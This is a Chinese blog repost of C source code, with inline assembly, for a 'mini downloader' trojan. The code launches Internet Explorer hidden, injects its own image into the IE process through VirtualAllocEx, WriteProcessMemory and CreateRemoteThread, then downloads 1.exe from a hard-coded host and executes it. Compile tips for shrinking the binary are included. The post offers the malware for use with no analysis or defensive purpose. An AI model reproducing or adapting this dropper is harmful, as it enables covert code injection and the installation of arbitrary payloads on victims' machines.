fangyuanning

统计

最新评论

插入IE进程的下载者源代码

插入IE进程的下载者源代码 收藏
/*
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")  
//#pragma comment(linker, "/merge:.rdata=.text")  
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")  
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")

HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;

void download() //注入使用的下载函数
{
    hshell=LoadLibrary("Shell32.dll");
    hurlmon=LoadLibrary("urlmon.dll");
   
    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
   
    DOWNFILE(NULL,"http://192.168.0.188/1.exe","c:\\1.exe",0, NULL);
    SHELLRUN(0,"open","c:\\1.exe",NULL,NULL,5);
    ExitProcess(0);
};


void main() //主函数
{  
    //1.得到IE路径,并运行
    char iename[MAX_PATH],iepath[MAX_PATH];
    ZeroMemory(iename,sizeof(iename));
    ZeroMemory(iepath,sizeof(iepath));
   
    GetWindowsDirectory(iepath,MAX_PATH);
    strncpy(iename,iepath,3);
    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
    //strcat(iename,"windows\\notepad.EXE");
    WinExec(iename,SW_HIDE);
    Sleep(2000);
   
    //2.得到 IE process handle
    HWND htemp;
    htemp=FindWindow("IEFrame",NULL);
    GetWindowThreadProcessId(htemp,&pid);
    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
   
    //3.分配内存
    HMODULE Module;
    LPVOID NewModule;
    DWORD Size;
    LPDWORD lpimagesize;
   
    Module = GetModuleHandle(NULL);//进程映像的基址
    //得到内存镜像大小
    _asm
    {
        push eax;
        push ebx;
        mov ebx,Module;
        mov eax,[ebx+0x3c];
        lea eax,[ebx+eax+0x50];  
        mov eax,[eax]
            mov lpimagesize,eax;
        pop ebx;
        pop eax;
    };
    Size=(DWORD)lpimagesize;
    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
   
    //4.写内存,创建线程
    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
    LPTHREAD_START_ROUTINE entrypoint;
    __asm
    {
        push eax;
        lea eax,download;
        mov entrypoint,eax;
        pop eax
    }
   
    CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行
   
    //5.关闭对象
    CloseHandle(processhandle);
    Sleep(5000);
    return;
};

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/zshwlw/archive/2008/05/27/2487299.aspx

posted on 2009-07-19 21:19 Pop 阅读(331) 评论(0)  编辑 收藏 引用

只有注册用户登录后才能发表评论。